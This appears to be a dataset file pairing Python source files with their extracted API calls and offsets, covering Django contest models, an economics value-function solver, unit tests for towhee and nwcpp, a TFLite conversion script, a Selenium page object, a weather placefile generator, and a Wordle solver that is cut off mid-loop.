code | apis | extract_api
---|---|---
from socket import create_connection
from django.db import models
from django.utils import timezone
class Slave(models.Model):
def __str__(self):
return self.ip + str(self.port)
ip = models.GenericIPAddressField()
port = models.IntegerField()
busy = models.BooleanField(default=False)
def is_alive(self):
addr = (self.ip, self.port)
        try:
            con = create_connection(addr)
        except OSError:
            # connection refused, timed out, or unreachable
            return False
        else:
            con.sendall('Alive'.encode('utf-8'))
            con.close()
            return True
def get_address(self):
return (self.ip, self.port)
    def __enter__(self):
        self.busy = True
        self.save()
        return self
def __exit__(self, exc_type, exc_value, traceback):
self.busy = False
self.save()
class ContestControl(models.Model):
"Control for the contest"
def __str__(self):
return self.name
name = models.CharField(max_length=100, default='Contest')
start = models.DateTimeField(default=timezone.now)
end = models.DateTimeField(default=timezone.now)
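# Sketch of the intended Slave usage (hypothetical; assumes a Slave row exists).
# The context-manager protocol marks a slave busy for the duration of a block:
#
#     slave = Slave.objects.filter(busy=False).first()
#     with slave:
#         if slave.is_alive():
#             addr = slave.get_address()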
|
[
"socket.create_connection",
"django.db.models.CharField",
"django.db.models.BooleanField",
"django.db.models.GenericIPAddressField",
"django.db.models.IntegerField",
"django.db.models.DateTimeField"
] |
[((202, 232), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', ([], {}), '()\n', (230, 232), False, 'from django.db import models\n'), ((244, 265), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (263, 265), False, 'from django.db import models\n'), ((277, 311), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (296, 311), False, 'from django.db import models\n'), ((922, 973), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'default': '"""Contest"""'}), "(max_length=100, default='Contest')\n", (938, 973), False, 'from django.db import models\n'), ((986, 1028), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (1006, 1028), False, 'from django.db import models\n'), ((1039, 1081), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (1059, 1081), False, 'from django.db import models\n'), ((404, 427), 'socket.create_connection', 'create_connection', (['addr'], {}), '(addr)\n', (421, 427), False, 'from socket import create_connection\n')]
|
import numpy as np
from numpy import vectorize
import scipy.optimize as so
@vectorize
def U(c, h, kappa, nu):
    if c <= 0:
        u = -np.inf
    else:
        u = np.log(c) - (kappa*h**(1+1/nu))/(1+1/nu)
return u
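# U is the per-period utility: log consumption minus a convex disutility of
# hours, u = ln(c) - kappa*h**(1+1/nu)/(1+1/nu); infeasible consumption
# (c <= 0) gets utility -inf so the optimizer steers away from it.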
class rep_ag:
def __init__(self, theta, beta, delta, kappa, nu, kmin, kmax, hmin, hmax, num_node=20, order=3):
self.theta = theta
self.beta = beta
self.delta = delta
self.kappa = kappa
self.nu = nu
self.kmin = kmin
self.kmax = kmax
self.hmin = hmin
self.hmax = hmax
self.num_node = num_node
self.order = order
##### creating the basis functions
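        ##### (Chebyshev polynomials of the first kind, built from the
        ##### recurrence T_n(x) = 2*x*T_{n-1}(x) - T_{n-2}(x), with T_0 = 1, T_1 = x)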
func = []
Psi1 = np.vectorize(lambda x: 1)
Psi2 = np.vectorize(lambda x: x)
func.append(Psi1)
func.append(Psi2)
for i in range(2,order):
f = np.vectorize(lambda x, n=i: 2*x*func[n-1](x)-func[n-2](x))
func.append(f)
self.func = func
self.gridk, self.gridk_cheb = self.cheb_node(kmin, kmax, num_node, cheby=0)
PHI = []
for f in self.func:
phi = f(2*(self.gridk-self.kmin)/(self.kmax-self.kmin) -1)
PHI.append(phi)
self.PHI = np.array(PHI).T
def cheb_node(self, a, b, num, cheby=1):
vec = np.arange(0,num)
vec = np.flip(vec, axis=0)
chb = np.cos((vec*np.pi)/(num-1))
points = (a+b)/2 + ((b-a)/2)*chb
if cheby == 0:
vec_unit = 1/2 + (1/2)*chb
return np.array(points), np.array(vec_unit)
else:
return np.array(points)
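    # cheb_node returns the Chebyshev extrema x_k = (a+b)/2 + ((b-a)/2)*cos(k*pi/(num-1))
    # on [a, b]; with cheby=0 it also returns the corresponding points on [0, 1].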
def update_val(self, Theta_guess, ki, start): #Theta_guess here is just for a specific ki so we also need ki
Kp = lambda c, h: (1-self.delta)*ki + ki**(1-self.theta) *h**self.theta - c
Kp_cheb = lambda c, h: 2*(Kp(c,h)-self.kmin)/(self.kmax-self.kmin) -1 # here the value is function of kp not k so we need to map kp to (0,1) not k
Suma = lambda c, h: sum(Theta_guess[i]*self.func[i](Kp_cheb(c,h)) for i in range(len(self.func)))
        VnotM = lambda x: -U(x[0], x[1], self.kappa, self.nu) - self.beta*Suma(x[0],x[1]) # negated objective: scipy minimizes, but we want to maximize
#non linear constraint
const = ({'type': 'ineq', 'fun': lambda x: ki**(1-self.theta)* x[1]**self.theta -x[0]})#higher or equal to zero
Boundc = (0.01*ki**(1-self.theta), None)
Boundh = (0.001*self.hmin,self.hmax)
Bound = (Boundc, Boundh)
        res = so.minimize(VnotM, start, method='SLSQP', bounds=Bound, constraints=const)  # warm-start from the previously found solution, so storing it pays off
        # the constraint is an inequality, not an upper bound
Value = -res.fun
c_opt = res.x[0]
h_opt = res.x[1]
return Value, c_opt, h_opt
def update_theta(self, Theta_Old, Old_opt):
New_opt = []
V = []
for i in range(len(self.gridk)):
            Value, c_opt, h_opt = self.update_val(Theta_Old, self.gridk[i], Old_opt[i,:]) # Old_opt is a matrix containing the previous policy functions
New_opt.append([c_opt, h_opt])
V.append(Value)
New_opt = np.array(New_opt)
V = np.array(V)
        New_theta = np.linalg.inv(self.PHI.T@self.PHI)@self.PHI.T@V
return New_opt, New_theta
def problem(self, Old_theta = None, Tol = 10**(-6)):
        if Old_theta is None:
Old_theta = np.zeros(len(self.func))
Old_c = (self.kmax/4)**(1-self.theta) *np.ones(len(self.gridk))
Old_h = (self.hmax/4)*np.ones(len(self.gridk))
Old_opt = np.vstack((Old_c,Old_h)).T
err = 1
j = 0
while err>Tol:
New_opt, New_theta = self.update_theta(Old_theta, Old_opt)
err = np.max(np.abs(Old_theta-New_theta))
if j%50 == 0:
print('iteration:', j)
print('error:', err)
Old_theta = New_theta
Old_opt = New_opt
j = j+1
self.New_opt = New_opt
self.New_theta = New_theta
return New_opt, New_theta
def Val_pol_fun(self):
kc = lambda k: 2*(k-self.kmin)/(self.kmax-self.kmin) -1
self.V = np.vectorize(lambda k: sum(self.New_theta[i]*self.func[i](kc(k)) for i in range(len(self.func))))
        self.Theta_c = np.linalg.inv(self.PHI.T@self.PHI)@self.PHI.T@self.New_opt[:,0]
        self.Theta_h = np.linalg.inv(self.PHI.T@self.PHI)@self.PHI.T@self.New_opt[:,1]
self.gc = np.vectorize(lambda k: sum(self.Theta_c[i]*self.func[i](kc(k)) for i in range(len(self.func))))
self.gh = np.vectorize(lambda k: sum(self.Theta_h[i]*self.func[i](kc(k)) for i in range(len(self.func))))
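# Minimal usage sketch (hypothetical parameter values in the style of a
# standard RBC calibration; not from the original source):
#
#     ag = rep_ag(theta=0.36, beta=0.96, delta=0.08, kappa=1.0, nu=1.0,
#                 kmin=0.5, kmax=20.0, hmin=0.0, hmax=1.0)
#     opt, theta_hat = ag.problem()   # iterate until the coefficients converge
#     ag.Val_pol_fun()                # recover V(k), gc(k), gh(k)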
|
[
"scipy.optimize.minimize",
"numpy.vectorize",
"numpy.flip",
"numpy.log",
"numpy.abs",
"numpy.arange",
"numpy.array",
"numpy.cos",
"numpy.linalg.inv",
"numpy.vstack"
] |
[((732, 757), 'numpy.vectorize', 'np.vectorize', (['(lambda x: 1)'], {}), '(lambda x: 1)\n', (744, 757), True, 'import numpy as np\n'), ((774, 799), 'numpy.vectorize', 'np.vectorize', (['(lambda x: x)'], {}), '(lambda x: x)\n', (786, 799), True, 'import numpy as np\n'), ((1378, 1395), 'numpy.arange', 'np.arange', (['(0)', 'num'], {}), '(0, num)\n', (1387, 1395), True, 'import numpy as np\n'), ((1410, 1430), 'numpy.flip', 'np.flip', (['vec'], {'axis': '(0)'}), '(vec, axis=0)\n', (1417, 1430), True, 'import numpy as np\n'), ((1446, 1477), 'numpy.cos', 'np.cos', (['(vec * np.pi / (num - 1))'], {}), '(vec * np.pi / (num - 1))\n', (1452, 1477), True, 'import numpy as np\n'), ((2612, 2686), 'scipy.optimize.minimize', 'so.minimize', (['VnotM', 'start'], {'method': '"""SLSQP"""', 'bounds': 'Bound', 'constraints': 'const'}), "(VnotM, start, method='SLSQP', bounds=Bound, constraints=const)\n", (2623, 2686), True, 'import scipy.optimize as so\n'), ((3350, 3367), 'numpy.array', 'np.array', (['New_opt'], {}), '(New_opt)\n', (3358, 3367), True, 'import numpy as np\n'), ((3381, 3392), 'numpy.array', 'np.array', (['V'], {}), '(V)\n', (3389, 3392), True, 'import numpy as np\n'), ((1271, 1284), 'numpy.array', 'np.array', (['PHI'], {}), '(PHI)\n', (1279, 1284), True, 'import numpy as np\n'), ((1672, 1688), 'numpy.array', 'np.array', (['points'], {}), '(points)\n', (1680, 1688), True, 'import numpy as np\n'), ((179, 188), 'numpy.log', 'np.log', (['c'], {}), '(c)\n', (185, 188), True, 'import numpy as np\n'), ((1600, 1616), 'numpy.array', 'np.array', (['points'], {}), '(points)\n', (1608, 1616), True, 'import numpy as np\n'), ((1618, 1636), 'numpy.array', 'np.array', (['vec_unit'], {}), '(vec_unit)\n', (1626, 1636), True, 'import numpy as np\n'), ((3414, 3450), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.PHI.T @ self.PHI)'], {}), '(self.PHI.T @ self.PHI)\n', (3427, 3450), True, 'import numpy as np\n'), ((3802, 3827), 'numpy.vstack', 'np.vstack', (['(Old_c, Old_h)'], {}), '((Old_c, Old_h))\n', (3811, 3827), True, 'import numpy as np\n'), ((3983, 4012), 'numpy.abs', 'np.abs', (['(Old_theta - New_theta)'], {}), '(Old_theta - New_theta)\n', (3989, 4012), True, 'import numpy as np\n'), ((4557, 4593), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.PHI.T @ self.PHI)'], {}), '(self.PHI.T @ self.PHI)\n', (4570, 4593), True, 'import numpy as np\n'), ((4646, 4682), 'numpy.linalg.inv', 'np.linalg.inv', (['(self.PHI.T @ self.PHI)'], {}), '(self.PHI.T @ self.PHI)\n', (4659, 4682), True, 'import numpy as np\n')]
|
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pathlib import Path
import unittest
from PIL import Image
from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV
from towhee.engine.engine import EngineConfig
CACHE_PATH = Path(__file__).parent.parent.resolve()
class TestPipeline(unittest.TestCase):
"""
Tests `pipeline` functionality.
"""
def setUp(self):
conf = EngineConfig()
conf.cache_path = CACHE_PATH
conf.sched_interval_ms = 20
def test_empty_input(self):
p = pipeline('test_util/simple_pipeline', cache=str(CACHE_PATH))
self.assertEqual(p(), [])
def test_simple_pipeline(self):
p = pipeline('test_util/simple_pipeline', cache=str(CACHE_PATH))
res = p(0)
self.assertEqual(res[0], 3)
def test_embedding_pipeline(self):
p = pipeline('test_util/resnet50_embedding',
cache=str(CACHE_PATH))
img_path = CACHE_PATH / 'data' / 'dataset' / 'kaggle_dataset_small' / \
'train' / '0021f9ceb3235effd7fcde7f7538ed62.jpg'
img = Image.open(str(img_path))
res = p(img)
self.assertEqual(res[0].size, 1000)
def test_simple_pipeline_multirow(self):
#pylint: disable=protected-access
p = pipeline('test_util/simple_pipeline', cache=str(CACHE_PATH))
p._pipeline.parallelism = 2
res = p(list(range(1000)))
for n in range(1000):
self.assertEqual(res[n], n+3)
class TestPipelineCache(unittest.TestCase):
def test_pipeline_cache(self):
self.assertEqual(_get_pipeline_cache(
None), Path.home() / '.towhee/pipelines')
os.environ[_PIPELINE_CACHE_ENV] = '/opt/.pipeline'
self.assertEqual(_get_pipeline_cache(
None), Path('/opt/.pipeline'))
self.assertEqual(_get_pipeline_cache(
'/home/mycache'), Path('/home/mycache'))
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"pathlib.Path.home",
"towhee.engine.engine.EngineConfig",
"towhee._get_pipeline_cache",
"pathlib.Path"
] |
[((2512, 2527), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2525, 2527), False, 'import unittest\n'), ((969, 983), 'towhee.engine.engine.EngineConfig', 'EngineConfig', ([], {}), '()\n', (981, 983), False, 'from towhee.engine.engine import EngineConfig\n'), ((2155, 2180), 'towhee._get_pipeline_cache', '_get_pipeline_cache', (['None'], {}), '(None)\n', (2174, 2180), False, 'from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV\n'), ((2315, 2340), 'towhee._get_pipeline_cache', '_get_pipeline_cache', (['None'], {}), '(None)\n', (2334, 2340), False, 'from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV\n'), ((2355, 2377), 'pathlib.Path', 'Path', (['"""/opt/.pipeline"""'], {}), "('/opt/.pipeline')\n", (2359, 2377), False, 'from pathlib import Path\n'), ((2405, 2441), 'towhee._get_pipeline_cache', '_get_pipeline_cache', (['"""/home/mycache"""'], {}), "('/home/mycache')\n", (2424, 2441), False, 'from towhee import pipeline, _get_pipeline_cache, _PIPELINE_CACHE_ENV\n'), ((2456, 2477), 'pathlib.Path', 'Path', (['"""/home/mycache"""'], {}), "('/home/mycache')\n", (2460, 2477), False, 'from pathlib import Path\n'), ((800, 814), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (804, 814), False, 'from pathlib import Path\n'), ((2195, 2206), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (2204, 2206), False, 'from pathlib import Path\n')]
|
import tensorflow as tf
import platform
def os_info():
return {
'machine': platform.machine(),
'node': platform.node(),
'os': platform.platform(),
'cuda': tf.test.is_built_with_cuda()
}
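# Example (values are machine-dependent):
#     print(os_info())
#     # {'machine': 'x86_64', 'node': 'myhost', 'os': 'Linux-...', 'cuda': True}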
|
[
"tensorflow.test.is_built_with_cuda",
"platform.machine",
"platform.node",
"platform.platform"
] |
[((88, 106), 'platform.machine', 'platform.machine', ([], {}), '()\n', (104, 106), False, 'import platform\n'), ((124, 139), 'platform.node', 'platform.node', ([], {}), '()\n', (137, 139), False, 'import platform\n'), ((155, 174), 'platform.platform', 'platform.platform', ([], {}), '()\n', (172, 174), False, 'import platform\n'), ((192, 220), 'tensorflow.test.is_built_with_cuda', 'tf.test.is_built_with_cuda', ([], {}), '()\n', (218, 220), True, 'import tensorflow as tf\n')]
|
import unittest
import nwcpp
class VariablesTestCase(unittest.TestCase):
def test_variable_declarations(self):
dag = nwcpp.Dataflow()
a = dag.declare_variable('a')
with self.assertRaises(RuntimeError):
# duplicate name
dag.declare_variable('a')
b = dag.declare_variable(name='b')
def test_variables_list(self):
dag = nwcpp.Dataflow()
c = dag.declare_variable('c')
b = dag.declare_variable('b')
a = dag.declare_variable('a')
self.assertEqual(dag.variables, [a, b, c])
def test_variable_lookup(self):
dag = nwcpp.Dataflow()
c = dag.declare_variable('c')
b = dag.declare_variable('b')
a = dag.declare_variable('a')
self.assertIsNone(dag.lookup_variable(name='B'))
self.assertIsNone(dag.lookup_variable(name='aa'))
for v in dag.variables:
self.assertEqual(dag.lookup_variable(name=v.name), v)
class OperationsTestCase(unittest.TestCase):
def test_mixing_dags(self):
dag_1 = nwcpp.Dataflow()
dag_2 = nwcpp.Dataflow()
a_1 = dag_1.declare_variable('a')
a_2 = dag_2.declare_variable('a')
sum_1 = dag_1.create_binary_op('+', a_1, a_1)
sum_2 = dag_2.create_binary_op('+', a_2, a_2)
with self.assertRaises(RuntimeError):
dag_1.create_binary_op('+', a_1, a_2)
with self.assertRaises(RuntimeError):
dag_2.create_binary_op('+', a_1, a_2)
with self.assertRaises(RuntimeError):
dag_1.create_binary_op('+', sum_1, sum_2)
with self.assertRaises(RuntimeError):
dag_2.create_binary_op('+', sum_1, sum_2)
def test_binary_operations(self):
dag = nwcpp.Dataflow()
a = dag.declare_variable('a')
b = dag.declare_variable('b')
# test all supported forms
div_1 = dag.create_binary_op('/', a, b)
div_2 = dag.div(a, b)
div_3 = a / b
with self.assertRaises(RuntimeError):
div_1.eval()
a.assign(8)
b.assign(4)
self.assertEqual(div_1.eval(), 2)
self.assertEqual(div_2.eval(), 2)
self.assertEqual(div_3.eval(), 2)
def test_operator_overloading(self):
dag = nwcpp.Dataflow()
a = dag.declare_variable('a')
b = dag.declare_variable('b')
c = dag.declare_variable('c')
result = a + b * c
a.assign(1)
b.assign(2)
c.assign(3)
self.assertEqual(result.eval(), 7)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"nwcpp.Dataflow"
] |
[((2571, 2586), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2584, 2586), False, 'import unittest\n'), ((132, 148), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (146, 148), False, 'import nwcpp\n'), ((393, 409), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (407, 409), False, 'import nwcpp\n'), ((626, 642), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (640, 642), False, 'import nwcpp\n'), ((1065, 1081), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (1079, 1081), False, 'import nwcpp\n'), ((1098, 1114), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (1112, 1114), False, 'import nwcpp\n'), ((1752, 1768), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (1766, 1768), False, 'import nwcpp\n'), ((2277, 2293), 'nwcpp.Dataflow', 'nwcpp.Dataflow', ([], {}), '()\n', (2291, 2293), False, 'import nwcpp\n')]
|
### tf-nightly-2.2.0.dev20200418
import tensorflow as tf
# Weight Quantization - Input/Output=float32
converter = tf.lite.TFLiteConverter.from_saved_model('./saved_model')
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS,tf.lite.OpsSet.SELECT_TF_OPS]
tflite_quant_model = converter.convert()
with open('yolov3_nano_voc_416_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - yolov3_nano_voc_416_weight_quant.tflite")
|
[
"tensorflow.lite.TFLiteConverter.from_saved_model"
] |
[((116, 173), 'tensorflow.lite.TFLiteConverter.from_saved_model', 'tf.lite.TFLiteConverter.from_saved_model', (['"""./saved_model"""'], {}), "('./saved_model')\n", (156, 173), True, 'import tensorflow as tf\n')]
|
# vim: expandtab tabstop=4 shiftwidth=4
from numpy import ndarray
import matplotlib.pyplot as plt
def plot_complex(*args, **kwargs):
'''
Plots complex data in the complex plane.
Parameters
----------
args: array_like
The complex arrays to plot
kwargs: dict
        Parameters passed through to plt.plot().
'''
plotargs = []
for arg in args:
        if isinstance(arg, ndarray):
plotargs.append(arg.real)
plotargs.append(arg.imag)
else:
plotargs.append(arg)
plt.plot(*plotargs, **kwargs)
def plotc(*args, **kwargs):
'''
An alias of plot_complex().
'''
return plot_complex(*args, **kwargs)
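# Example usage (hypothetical data; requires an interactive matplotlib backend):
#     import numpy as np
#     z = np.exp(1j * np.linspace(0, 2 * np.pi, 100))  # points on the unit circle
#     plotc(z, '.')
#     plt.show()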
|
[
"matplotlib.pyplot.plot"
] |
[((562, 591), 'matplotlib.pyplot.plot', 'plt.plot', (['*plotargs'], {}), '(*plotargs, **kwargs)\n', (570, 591), True, 'import matplotlib.pyplot as plt\n')]
|
"""Implements sauce lab login checkout first step."""
from enum import Enum
from selenium.webdriver.remote.webdriver import WebDriver
from module_06.src.elements.base_page_element import BasePageElement
from module_06.src.elements.header import Header
from module_06.src.elements.inventory_items import InventoryItems
from module_06.src.elements.select_element import SelectElement
from module_06.src.locators.inventory import InventoryPageLoc
from module_06.src.locators.cart import CartItemLoc
from module_06.src.locators.checkout import CheckoutItemLoc
from module_06.src.pages.base_page import BasePage
from module_06.src.mixin.InventoryItemMixin import InventoryItemMixin
from module_06.src.locators.inventory_details import InventoryDetailsLoc
from module_06.src.elements.checkout_info import ContactCheckout
from module_06.src.pages.cart import CartPage
_URL = 'https://www.saucedemo.com/checkout-step-one.html'
class CheckoutFirstStep(InventoryItemMixin, BasePage):
def __init__(self, driver: WebDriver, timeout: int = 5):
super().__init__(driver, _URL, timeout)
self._info_checkout = ContactCheckout(self._wait)
self.header = Header(self._wait)
def fill_info(self, firstname="", lastname="", postal_code=""):
self._info_checkout.fill_info(firstname, lastname, postal_code)
def checkout(self):
self._info_checkout.checkout()
return CartPage(self._wait._driver, self._wait._timeout)
def back_to_cart(self):
self._info_checkout.back_to_cart()
def get_error_msg(self):
return self._info_checkout.get_error_msg()
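# Typical flow (sketch; assumes a logged-in session already on checkout step one):
#     step_one = CheckoutFirstStep(driver)
#     step_one.fill_info('John', 'Doe', '12345')
#     next_page = step_one.checkout()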
|
[
"module_06.src.elements.checkout_info.ContactCheckout",
"module_06.src.pages.cart.CartPage",
"module_06.src.elements.header.Header"
] |
[((1117, 1144), 'module_06.src.elements.checkout_info.ContactCheckout', 'ContactCheckout', (['self._wait'], {}), '(self._wait)\n', (1132, 1144), False, 'from module_06.src.elements.checkout_info import ContactCheckout\n'), ((1167, 1185), 'module_06.src.elements.header.Header', 'Header', (['self._wait'], {}), '(self._wait)\n', (1173, 1185), False, 'from module_06.src.elements.header import Header\n'), ((1406, 1455), 'module_06.src.pages.cart.CartPage', 'CartPage', (['self._wait._driver', 'self._wait._timeout'], {}), '(self._wait._driver, self._wait._timeout)\n', (1414, 1455), False, 'from module_06.src.pages.cart import CartPage\n')]
|
#!/usr/bin/env python
"""Author: <NAME>"""
import math
import cgi
from pyiem.util import ssw
def createCircleAroundWithRadius(lat, lon, radiusMiles):
"""Create circle."""
latArray = []
lonArray = []
for brng in range(0, 360):
lat2, lon2 = getLocation(lat, lon, brng, radiusMiles)
latArray.append(lat2)
lonArray.append(lon2)
return lonArray, latArray
def getLocation(lat1, lon1, brng, distanceMiles):
"""getLocation."""
lat1 = lat1 * math.pi / 180.0
lon1 = lon1 * math.pi / 180.0
# earth radius - If ever needed to be in km vs. miles, change R
R = 3959
distanceMiles = distanceMiles/R
brng = (brng / 90) * math.pi / 2
lat2 = (
math.asin(
math.sin(lat1) * math.cos(distanceMiles) + math.cos(lat1) *
math.sin(distanceMiles) * math.cos(brng))
)
lon2 = (
lon1 + math.atan2(
math.sin(brng) * math.sin(distanceMiles) * math.cos(lat1),
math.cos(distanceMiles) - math.sin(lat1) * math.sin(lat2))
)
lon2 = 180.0 * lon2 / math.pi
lat2 = 180.0 * lat2 / math.pi
return lat2, lon2
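# Example (hypothetical check): the point 100 miles due east (bearing 90)
# of the default coordinates used in main():
#     lat2, lon2 = getLocation(42.014004, -93.635773, 90, 100)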
def main():
"""Go Main Go."""
form = cgi.FieldStorage()
ssw("Content-type: application/octet-stream\n")
ssw(('Content-Disposition: attachment; filename=placefile_rings.txt\n\n'))
# Things for the user to theoretically input:
loc = form.getfirst("loc", "Jack Trice Stadium")
pointLat = float(form.getfirst("lat", 42.014004))
pointLon = float(form.getfirst("lon", -93.635773))
ssw((
"; This is a placefile to draw a range ring x miles from: %s\n"
"; Created by <NAME> - 8/9/2019\n"
"; Code adapted from <NAME> (2016)\n\n\n"
"Threshold: 999 \n"
"Title: Rings @ %s\n"
) % (loc, loc))
for i in range(3):
distanceInMiles = float(form.getfirst("m%s" % (i, ), 100))
if distanceInMiles <= 0.00001:
continue
r = int(form.getfirst('r%s' % (i, ), 255))
g = int(form.getfirst('g%s' % (i, ), 255))
b = int(form.getfirst('b%s' % (i, ), 0))
a = int(form.getfirst('a%s' % (i, ), 255))
# Create the lon/lat pairs
X, Y = createCircleAroundWithRadius(
pointLat, pointLon, distanceInMiles)
ssw((
"Color: %s %s %s %s\n"
"Line: 2, 0, \"%.1f miles from %s\" \n"
) % (r, g, b, a, distanceInMiles, loc))
for x, y in zip(X, Y):
ssw(" %s, %s\n" % (y, x))
ssw("End:\n\n")
if __name__ == '__main__':
main()
|
[
"pyiem.util.ssw",
"cgi.FieldStorage",
"math.cos",
"math.sin"
] |
[((1189, 1207), 'cgi.FieldStorage', 'cgi.FieldStorage', ([], {}), '()\n', (1205, 1207), False, 'import cgi\n'), ((1212, 1259), 'pyiem.util.ssw', 'ssw', (['"""Content-type: application/octet-stream\n"""'], {}), "('Content-type: application/octet-stream\\n')\n", (1215, 1259), False, 'from pyiem.util import ssw\n'), ((1264, 1336), 'pyiem.util.ssw', 'ssw', (['"""Content-Disposition: attachment; filename=placefile_rings.txt\n\n"""'], {}), "('Content-Disposition: attachment; filename=placefile_rings.txt\\n\\n')\n", (1267, 1336), False, 'from pyiem.util import ssw\n'), ((1556, 1751), 'pyiem.util.ssw', 'ssw', (['("""; This is a placefile to draw a range ring x miles from: %s\n; Created by <NAME> - 8/9/2019\n; Code adapted from <NAME> (2016)\n\n\nThreshold: 999 \nTitle: Rings @ %s\n"""\n % (loc, loc))'], {}), '(\n """; This is a placefile to draw a range ring x miles from: %s\n; Created by <NAME> - 8/9/2019\n; Code adapted from <NAME> (2016)\n\n\nThreshold: 999 \nTitle: Rings @ %s\n"""\n % (loc, loc))\n', (1559, 1751), False, 'from pyiem.util import ssw\n'), ((2301, 2406), 'pyiem.util.ssw', 'ssw', (['("""Color: %s %s %s %s\nLine: 2, 0, "%.1f miles from %s" \n""" % (r, g, b, a,\n distanceInMiles, loc))'], {}), '("""Color: %s %s %s %s\nLine: 2, 0, "%.1f miles from %s" \n""" % (r, g, b,\n a, distanceInMiles, loc))\n', (2304, 2406), False, 'from pyiem.util import ssw\n'), ((2523, 2538), 'pyiem.util.ssw', 'ssw', (['"""End:\n\n"""'], {}), "('End:\\n\\n')\n", (2526, 2538), False, 'from pyiem.util import ssw\n'), ((2489, 2514), 'pyiem.util.ssw', 'ssw', (["(' %s, %s\\n' % (y, x))"], {}), "(' %s, %s\\n' % (y, x))\n", (2492, 2514), False, 'from pyiem.util import ssw\n'), ((743, 757), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (751, 757), False, 'import math\n'), ((760, 783), 'math.cos', 'math.cos', (['distanceMiles'], {}), '(distanceMiles)\n', (768, 783), False, 'import math\n'), ((841, 855), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (849, 855), False, 'import math\n'), ((958, 972), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (966, 972), False, 'import math\n'), ((986, 1009), 'math.cos', 'math.cos', (['distanceMiles'], {}), '(distanceMiles)\n', (994, 1009), False, 'import math\n'), ((786, 800), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (794, 800), False, 'import math\n'), ((815, 838), 'math.sin', 'math.sin', (['distanceMiles'], {}), '(distanceMiles)\n', (823, 838), False, 'import math\n'), ((915, 929), 'math.sin', 'math.sin', (['brng'], {}), '(brng)\n', (923, 929), False, 'import math\n'), ((932, 955), 'math.sin', 'math.sin', (['distanceMiles'], {}), '(distanceMiles)\n', (940, 955), False, 'import math\n'), ((1012, 1026), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (1020, 1026), False, 'import math\n'), ((1029, 1043), 'math.sin', 'math.sin', (['lat2'], {}), '(lat2)\n', (1037, 1043), False, 'import math\n')]
|
from random import randint as rint
from sys import stderr, exit
wordlist = []
GREEN, YELLOW, GRAY = ('0', '1', '2')
def info():
"""
Wordle Game Solver
https://www.nytimes.com/games/wordle/index.html
Created by Leo (<NAME>), 2022
Any suggestion is welcome!
Check my code at https://github.com/LeoTheBestCoder/wordle-solver
"""
return
def showrule():
print('========================================================================')
print('If the result is GREEN, enter 0')
print('If the result is YELLOW, enter 1')
print('If the result is GRAY, enter 2')
print('Only a string with length = 5 and contains ONLY 0, 1, 2 is ACCEPTED!')
print('ex. Enter 12200 if the result is "yellow gray gray green green".')
print('========================================================================')
input('\nReady to start? (Press ENTER to continue)')
def getword():
idx = rint(0, len(wordlist) - 1)
return wordlist[idx]
def readfile():
global wordlist
with open('wordlist.txt', 'r') as fh:
        wordlist = [w.rstrip('\n') for w in fh.readlines()]
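# (wordlist.txt is assumed to contain one candidate five-letter word per line)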
def check_r(res: str) -> bool:
if len(res) != 5:
return False
for ch in res:
if ch not in ['0', '1', '2']:
return False
return True
def update(word: str, res: str):
global wordlist
try:
assert check_r(res)
if res != '00000':
wordlist.remove(word)
for i in range(5):
invalid = []
if res[i] == GREEN:
# correct character + correct position
for w in wordlist:
if w[i] != word[i]:
invalid.append(w)
elif res[i] == YELLOW:
# correct character + wrong position
for w in wordlist:
if word[i] not in w:
invalid.append(w)
elif w[i] == word[i]:
invalid.append(w)
elif res[i] == GRAY:
# wrong character
for w in wordlist:
if word[i] in w:
special_case = False
for j in range(5):
if i != j and word[i] == word[j] and res[j] in [GREEN, YELLOW]:
special_case = True
if not special_case:
invalid.append(w)
# else:
# print(f'{w} is a special case')
for i_word in invalid:
wordlist.remove(i_word)
    except (AssertionError, ValueError):
        stderr.write('Invalid result!\n')
        exit(-1)
def run():
print(info.__doc__)
readfile()
showrule()
word = getword()
while len(set(word)) != 5:
word = getword()
print(f'Try to guess "{word}". What is the result? ', end = '')
res = input()
update(word, res)
# print(f'len = {len(wordlist)}')
# print(wordlist)
while res != '00000':
word = getword()
